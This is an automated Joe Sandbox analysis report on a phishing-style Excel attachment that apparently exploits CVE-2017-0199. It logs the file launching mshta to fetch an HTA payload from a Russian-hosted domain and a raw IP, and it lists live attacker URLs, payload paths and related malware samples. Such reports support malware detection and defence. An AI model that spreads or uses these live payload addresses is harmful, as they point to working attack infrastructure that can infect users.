Source: global trafficHTTP traffic detected: GET /e3EPl0?&certification=exclusive&kitty=thinkable HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 198.12.89.24
Source: global trafficDNS traffic detected: DNS query: kryx.ru
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: PO#4500550389.xla.xlsxString found in binary or memory: https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableD
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49701 version: TLS 1.2

System Summary

barindex
Source: PO#4500550389.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO#4500550389.xla.xlsxOLE: Microsoft Excel 2007+
Source: PO#4500550389.xla.xlsxOLE indicator, VBA macros: true
Source: PO#4500550389.xla.xlsxStream path 'MBD00C9763B/\x1Ole' : https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableDAmwP#|--t#+EX3aR{%NoJ7QE|%v].al|!hEdzL;RFFxcq0hHYX2Q0rNvtFeAa1BDqDD3pNb3bgcRDoaRuO44Etx52CLmzs8X649k9SGYe9IqaLBCH0NwaELNn1J41JPRtrKnnkmlfvZGqdSl9KETEFZUWLp2LUk9z3Fj6UjpgdP4Q7zHGDNQt1iqtnVuCBnb3BmP9KUS0u78?- L]O!u`^p/
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'po#4500550389.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal60.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO#4500550389.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{06311D6C-6F9E-42B9-97A1-48FDED09743F} - OProcSessId.datJump to behavior
Source: PO#4500550389.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO#4500550389.xla.xlsxVirustotal: Detection: 33%
Source: PO#4500550389.xla.xlsxReversingLabs: Detection: 19%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PO#4500550389.xla.xlsxStatic file information: File size 1172480 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: PO#4500550389.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO#4500550389.xla.xlsxStream path 'MBD00C9763A/MBD00320C7F/Package' entropy: 7.98905669124 (max. 8.0)
Source: PO#4500550389.xla.xlsxStream path 'Workbook' entropy: 7.99202969994 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 924Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640393 Sample: PO#4500550389.xla.xlsx Startdate: 17/03/2025 Architecture: WINDOWS Score: 60 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0032.t-0009.t-msedge.net 2->21 23 4 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Excel sheet contains many unusual embedded objects 2->33 35 Document exploit detected (process start blacklist hit) 2->35 37 Sigma detected: Suspicious Microsoft Office Child Process 2->37 7 EXCEL.EXE 224 62 2->7         started        11 EXCEL.EXE 45 47 2->11         started        signatures3 process4 dnsIp5 25 kryx.ru 188.225.72.170, 443, 49697 TIMEWEB-ASRU Russian Federation 7->25 27 s-part-0032.t-0009.t-msedge.net 13.107.246.60, 443, 49701, 49703 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->27 29 198.12.89.24, 49698, 80 AS-COLOCROSSINGUS United States 7->29 17 C:\Users\user\...\~$PO#4500550389.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO#4500550389.xla.xlsx33%VirustotalBrowse
PO#4500550389.xla.xlsx19%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkable0%Avira URL Cloudsafe
https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableD0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
217.20.57.34
truefalse
    		high
    kryx.ru
    		188.225.72.170
    		truefalse
      		high
      s-0005.dual-s-dc-msedge.net
      		52.123.130.14
      		truefalse
        		high
        s-part-0032.t-0009.t-msedge.net
        		13.107.246.60
        		truefalse
          		high
          otelrules.svc.static.microsoft
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkablefalse
            • Avira URL Cloud: safe
            		unknown
            https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
              		high
              https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                		high
                https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                  		high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://kryx.ru/e3EPl0?&certification=exclusive&kitty=thinkableDPO#4500550389.xla.xlsxfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  198.12.89.24
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUSfalse
                  188.225.72.170
                  		kryx.ruRussian Federation
                  		9123TIMEWEB-ASRUfalse
                  13.107.246.60
                  		s-part-0032.t-0009.t-msedge.netUnited States
                  		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1640393
                  Start date and time:2025-03-17 09:27:15 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:PO#4500550389.xla.xlsx
                  Detection:MAL
                  Classification:mal60.expl.winXLSX@6/4@2/3
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.109.68.129, 23.199.214.10, 217.20.57.34, 20.189.173.10, 20.42.73.30, 52.123.130.14, 20.190.159.64, 4.245.163.56
                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fe3cr.delivery.mp.microsoft.com, config.officeapps.live.com, onedscolprdwus09.westus.cloudapp.azure.com, onedscolprdeus18.eastus.cloudapp.azure.com, ecs.office.trafficmanager.net, e
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:29:17API Interceptor949x Sleep call for process: splwow64.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  198.12.89.24niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                  • 198.12.89.24/346/cosses.exe
                  Our Order.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/efv/niceworkingskillgivenmebest.hta
                  Our Order.xlsGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/efv/niceworkingskillgivenmebest.hta
                  PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                  PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                  PO-ARJ-2025-15ACA.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/kvrmot/kvrm/greatcomebackdoingforeverwithgreat.hta
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                  DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                  • 198.12.89.24/xampp/glorry/iineveryiceskillwithgreatnewsgivenmebest.hta?&valuable=animated
                  wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP KeyloggerBrowse
                  • 198.12.89.24/312/cosse.exe
                  188.225.72.170DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                      DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                        _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                          _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                            • www.mimecast.com/Customers/Support/Contact-support/
                            http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                            • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            kryx.ruDHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            • 188.225.72.170
                            s-0005.dual-s-dc-msedge.netPurchase Order dt.17.2025.docxGet hashmaliciousUnknownBrowse
                            • 52.123.131.14
                            phish_alert_sp2_2.0.0.0(48).emlGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            TESTINGPlayback_March 13, 2025 at 093142 PM.docxGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            Mandatory Notification Nashintl.msgGet hashmaliciousUnknownBrowse
                            • 52.123.130.14
                            Quotation.xlsGet hashmaliciousUnknownBrowse
                            • 52.123.131.14
                            #Ud83d#Udcc5 Vos rendez-vous du num#U00e9rique et de la tech pour mars et avril 2025 (116Ko).msgGet hashmaliciousUnknownBrowse
                            • 52.123.131.14
                            I_ Order.msgGet hashmaliciousAgentTeslaBrowse
                            • 52.123.130.14
                            I_ Order.msgGet hashmaliciousAgentTeslaBrowse
                            • 52.123.130.14
